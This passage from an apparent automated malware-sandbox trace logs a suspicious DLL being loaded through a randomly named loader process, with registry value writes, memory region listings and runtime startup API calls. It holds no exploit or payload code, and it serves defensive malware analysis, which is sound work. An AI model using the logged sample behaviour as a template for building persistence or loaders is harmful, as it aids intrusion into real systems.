phkResult=0x26f634, lpdwDisposition=0x26f790 | out: phkResult=0x26f634*=0x80, lpdwDisposition=0x26f790*=0x2) returned 0x0 [0034.104] RegSetValueExA (in: hKey=0x80, lpValueName="HtParam", Reserved=0x0, dwType=0x4, lpData=0x26f638*=0xe10, cbData=0x4 | out: lpData=0x26f638*=0xe10) returned 0x0 [0034.104] RegSetValueExA (in: hKey=0x80, lpValueName="StVal", Reserved=0x0, dwType=0x4, lpData=0x26f638*=0x1, cbData=0x4 | out: lpData=0x26f638*=0x1) returned 0x0 [0034.104] RegSetValueExA (in: hKey=0x80, lpValueName="IPlace", Reserved=0x0, dwType=0x3, lpData=0x72ee31d4*, cbData=0x2 | out: lpData=0x72ee31d4*) returned 0x0 [0034.104] RegSetValueExA (in: hKey=0x80, lpValueName="Plgv", Reserved=0x0, dwType=0x3, lpData=0x26f6dc*, cbData=0x58 | out: lpData=0x26f6dc*) returned 0x0 [0034.104] RegSetValueExA (in: hKey=0x80, lpValueName="Plpv", Reserved=0x0, dwType=0x3, lpData=0x26f734*, cbData=0x5c | out: lpData=0x26f734*) returned 0x0 [0034.104] RegSetValueExA (in: hKey=0x80, lpValueName="ISFValue", Reserved=0x0, dwType=0x3, lpData=0x72ee313f*, cbData=0x0 | out: lpData=0x72ee313f*) returned 0x0 [0034.104] RegSetValueExA (in: hKey=0x80, lpValueName="ISRValue", Reserved=0x0, dwType=0x3, lpData=0x72ee313f*, cbData=0x0 | out: lpData=0x72ee313f*) returned 0x0 [0034.105] RegCloseKey (hKey=0x80) returned 0x0 [0034.106] HeapDestroy (hHeap=0x510000) returned 1 Process: id = "42" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fb00" os_pid = "0xc70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomS /fn_args=\"127.0.0.1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1888 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1889 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1890 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1891 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1892 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1893 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1894 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1895 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1896 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1897 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1898 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1899 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1900 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1901 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1902 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1903 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1904 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1905 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1906 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1907 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1908 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1909 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1910 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1911 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1912 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1913 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1914 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 1915 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1916 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1917 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1918 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1919 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1920 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 1921 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1922 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1923 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1924 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1925 start_va = 0x1200000 end_va = 0x139ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 1926 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1927 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1928 start_va = 0x13a0000 end_va = 0x155ffff entry_point = 0x0 region_type = private name = "private_0x00000000013a0000" filename = "" Thread: id = 90 os_tid = 0xc74 [0034.150] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f7e4 | out: lpSystemTimeAsFileTime=0x20f7e4*(dwLowDateTime=0xe20b2a50, dwHighDateTime=0x1d3dfba)) [0034.150] GetCurrentProcessId () returned 0xc70 [0034.150] GetCurrentThreadId () returned 0xc74 [0034.150] GetTickCount () returned 0x17aba [0034.150] QueryPerformanceCounter (in: lpPerformanceCount=0x20f7dc | out: lpPerformanceCount=0x20f7dc*=369835568) returned 1 [0034.151] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.151] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0034.151] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0034.151] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0034.151] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0034.152] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.152] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.152] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.152] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.152] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.152] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.152] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.152] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.152] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.152] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.153] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.153] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.153] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.153] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.153] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.153] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.154] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.154] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.154] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.154] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.154] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.154] GetCurrentThreadId () returned 0xc74 [0034.154] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomS /fn_args=\"127.0.0.1\"" [0034.154] GetEnvironmentStringsW () returned 0x227860* [0034.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0034.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x13909f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0034.154] FreeEnvironmentStringsW (penv=0x227860) returned 1 [0034.154] GetStartupInfoA (in: lpStartupInfo=0x20f734 | out: lpStartupInfo=0x20f734*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0034.155] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0034.155] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0034.155] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0034.155] SetHandleCount (uNumber=0x20) returned 0x20 [0034.155] GetLastError () returned 0x0 [0034.155] SetLastError (dwErrCode=0x0) [0034.155] GetLastError () returned 0x0 [0034.155] SetLastError (dwErrCode=0x0) [0034.155] GetLastError () returned 0x0 [0034.155] SetLastError (dwErrCode=0x0) [0034.155] GetACP () returned 0x4e4 [0034.155] GetLastError () returned 0x0 [0034.155] SetLastError (dwErrCode=0x0) [0034.155] IsValidCodePage (CodePage=0x4e4) returned 1 [0034.155] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x20f714 | out: lpCPInfo=0x20f714) returned 1 [0034.155] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x20f1e0 | out: lpCPInfo=0x20f1e0) returned 1 [0034.155] GetLastError () returned 0x0 [0034.155] SetLastError (dwErrCode=0x0) [0034.155] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x20f170 | out: lpCharType=0x20f170) returned 1 [0034.155] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f5f4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.155] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f5f4, cbMultiByte=256, lpWideCharStr=0x20ef58, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.155] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x20f1f4 | out: lpCharType=0x20f1f4) returned 1 [0034.155] GetLastError () returned 0x0 [0034.156] SetLastError (dwErrCode=0x0) [0034.156] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0034.156] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f5f4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.156] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f5f4, cbMultiByte=256, lpWideCharStr=0x20ef28, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā") returned 256 [0034.156] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.156] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x20ed18, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.156] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x20f4f4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1c\x1eçô,÷ ", lpUsedDefaultChar=0x0) returned 256 [0034.156] GetLastError () returned 0x0 [0034.156] SetLastError (dwErrCode=0x0) [0034.156] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f5f4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.156] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20f5f4, cbMultiByte=256, lpWideCharStr=0x20ef48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā") returned 256 [0034.156] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.156] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ矲狰Ā", cchSrc=256, lpDestStr=0x20ed38, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0034.156] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" 